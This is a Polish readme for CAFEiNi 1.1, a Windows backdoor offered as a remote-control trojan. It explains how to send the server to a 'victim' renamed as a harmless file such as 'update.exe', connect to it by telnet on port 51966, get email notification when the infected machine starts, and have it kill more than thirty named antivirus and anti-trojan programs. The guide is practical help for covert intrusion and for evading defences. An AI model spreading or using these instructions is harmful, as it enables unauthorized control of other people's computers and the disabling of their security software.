CAFEiNi 1.1 (nie bj si, CAFEiNi nie gryzie (na razie :))
NOWA GENERACJA BACKDOORW NA WIN95/98/2000/NT/ME (DO ZDALNEJ KONTROLI KOMPUTERA)

1. Dlaczego CAFEiNi jest lepszy od innych backdoorw (w rodzaju NetBusa):
-potrafi usun z pamici ponad 30 antywirusw i antybackdoorw pod Windowsa
-serwer automatycznie aktualizuje si przez protok http
-nie instaluje si w rejestrze (kiedy moe lub instaluje si pod losow nazw)
-jest napisany w Visual C++ (mniejszy i szybszy ni inne backdoory w Delphi)
-moesz sterowa zdalnym komputerem przez telnet (np. z Unixa)
-dziaa na Windowsie 95/98/ME a take na Windowsie NT/2000
-programem CAFEiNi klient mona kontrolowa kilka komputerw jednoczenie
 (np. wysun klapk CD-ROMu na 10 komputerach jednym klikniciem myszki)
-peny multitasking (np. moesz sciga i wysya pliki na wiele komputerw
 w jednym czasie)
-posiada duo nowych komend (szczeglne zwizane z ekranem)
-klient jest bardzo atwy w uyciu jak stary, dobry Netbus 1.x
-zawiera konfigurator do serwera 

2. Co to jest CAFEiNi.
CAFEiNi skada si z trzech programw dla Windowsa 95/98/ME/2000/NT:
a) "CAFEiNiserver.exe" - daje klientowi moliwo zdalnego kontrolowania komputera
   (hosta) na ktrym jest zainstalowany serwer. Serwer daje klientowi kontrol, czasami
   wiksz ni ma uytkownik siedzcy przy tym komputerze.
b) "CAFEiNiclient.exe" - suy do kontrolowania zdalnego komputera (serwera).
   Zamiast CAFEiNi klienta mona uywa dowolnego klienta telnetu aby kontrolowa
   komputer pracujcy pod Windowsem przez komputer pracujcy pod Unixem, Linuxem...
   Ale CAFEiNi klient potrafi duo wicej np.  ma skaner portw i moliwo kontrolowania
   kilku komputerw jednoczenie (np. wysunicie klapki CD-ROMu na wszystkich
   komputerach (serewerach) jednym klikniciem myszy).
c) "CAFEiNiconfig.exe" - suy do konfigurowania CAFEiNi serwera przed zainstalowaniem lub
   wysaniem do "ofiary" np. Mona wybra port lub wczy powiadomianie e-mailem o
   uruchomieniu serwera. Wtedy za kadym razem, gdy komputer z zainstalowanym serwerem
   jest wczany powinien zosta wysany e-mail.

3. Jak sprbowa bez instalowania serwera.
Moesz uruchomi serwer z opcj "/noinstall" np. "CAFEiNiserver.exe /noinstall"
i serwer nie zainstaluje si w systemie. Przy nastpnych uruchomieniu
komputera CAFEiNi serwer nie bdzie zainstalowany. Mona take uruchomi
serwer i klienta na tym samym komputerze (wpisz adres "127.0.0.1" w kliencie),
ale niektre komendy mog nie dziaa wcale albo le dziaa.

4. Jak zainstalowa serwer.
To bardzo proste, musisz uruchomi "CAFEiNiserver.exe" na komputerze "ofiary".
Jeeli nie masz fizycznego dostpu do komputera "ofiary" wylij serwer "ofiarze"
przez  FTP, IRC, ICQ...  Moesz zmieni nazw pliku "CAFEiNiserver.exe" na dowoln np.
"update.exe". Kiedy "ofiara" uruchomi ten program bdziesz mia zdalny dostp do
tego komputera. Programy "CAFEiNiclient.exe" i "CAFEiNiconfig.exe" s tylko do Twojego
uytku. Moesz uy CAFEiNi konfiguratora do ustalenia parametrw startowych serwera
przed jego zainstalowaniem lub wysaniem.

5. Jak si poczy (uzyska zdaln kontrol).
a) z CAFEiNi klienta ("CAFEiNiclient.exe" dziaa na Windowsie 95/98/ME/2000/NT) 
  wpisz nazw hosta lub IP ofiary, standartowym portem jest 51966 (0xCAFE),
  kliknij "Pocz" i jeeli serwer jest zainstalowany na tym komputerze a komputer
  podczony do Internetu (lub jakiej sieci) zostaniesz uzyskasz poczenie
b) z klienta telnetu (dziaa z dowolnego komputera, ktry ma telnet)
  wpisz komend "telnet <ofiara> 51966", gdzie <ofiara> jest nazw hosta lub numerem
  IP ofiary (np. z Windowsa kliknij "Start", pniej "Uruchom" i wpisz co w rodzaju:
  "telnet 107.3.45.11 51966")

6. Jak usun serwer.
Pocz si telnetowym klientem z serwerem (zobacz punkt 5). Ewentualnie wpisz haso,
jeeli jest ustawione. Pniej wystarczy wpisa komend "UNINSTALL" i nacisn Enter.
Program powinien zosta cakowicie usunity z systemu. Mona to sprawdzi restartujc
komputer, po czym serwer nie powinien ju odpowiada (brak moliwoci uzyskania dostpu).
UWAGA! Moe si zdarzy, e w systemie jest wicej ni jeden zainstalowany CAFEiNi serwer.
       Wtedy musisz odinstalowa serwer kilka razy (jedna komenda UNINSTALL usuwa jeden serwer)

7. Zabijanie antywirusw i antybackdoorw.
CAFEiNi serwer potrafi zabi (usun z pamici) wiele antywirusw i antybackdoorw.
Ale musi zosta uruchomiony przed kadym monitorem antywirusowym, ktry wykrywa t
wersj serwera, poniewa w innym wypadku CAFEiNi serwer si wogle nie uruchomi.

CAFEiNi serwer potrafi usun z pamici nastpujce antywirusy:
AntiViral Toolkit Pro
AntiVirus eXpert
Anywhere AntiVirus
Avast32
AVK SCAN
eSafe Protect
F-Secure AntiVirus
F/WIN32
FIBER Anti Virus 
Integrity Master
Intel LANDesk Virus Protect
McAfee VirusScan
MkS_Vir
Norton AntiVirus
Panda AntiVirus
PC-cillin
Quick Heal
Romanian AntiVirus Pro
Sophos Anti-Virus Sweep
ThunderBYTE AntiVirus
VirusSafe Web

CAFEiNi serwer potrafi usun z pamici nastpujce antybackdoory:
AntiTrojan
BackWork
HookProtect 
LockDown
Protector2K
Tauscan
The Cleaner
TrojanDefenseSuite
Trojan B' Gone

8. Jeeli chcesz pomc (raportowanie o bdach).
Jeeli wykrye jakie bdy prosz wysa raport do autorw na niej
podany adres e-mail. Gdy bdy te dotycz serwera prosz o zaczenie
pliku stworzonego w nastpujcy sposb:
Prosz uruchomi serwer z opcj "/debug=<drive>\<logfilename>"
(np. "CAFEiNiserver.exe /debug=c:\cafeini.log") i robi to samo co 
poprzednio gdy wykrye bd a pojawi si ten sam problem.

9. Wymagania programu CAFEiNi.
-komputer z zainstalowanym Windowsem 95/98/ME/2000/NT
-zainstalowane TCP/IP

10. Licencja.
Przez uywanie programu CAFEiNi uytkownik zgadza si na:
a) CAFEiNi jest rozpowszechniany za darmo
b) CAFEiNi jest dostarczany 'jaki jest', bez adnej gwarancji
c) autorzy nie s odpowiedzialni za szkody spowodowane uyciem tego programu
d) nie mona uywa tego programu do celw sprzecznych z polskim prawem
e) program CAFEiNi musi by rozpowszechniany wraz z t licencj

Przestrzegam, e bezprawne uzyskanie informacji, naruszenie integralnoci
komputerowego zapisu danych, podsuch i sabota komputerowy, a prociej
uszkodzenie, usunicie zmian danych, take zapoznanie si z treci
bezprawnie uzyskanych informacji jest karalne art.267  1 k.k. art.267  2
art.268  k.k. art.269 k.k.


11. Kontakt z autorami:
E-mail: cafeini@viper.pl
	cafeini@kki.net.pl
WWW:    http://viper.pl/~cafeini
        http://kki.net.pl/~cafeini
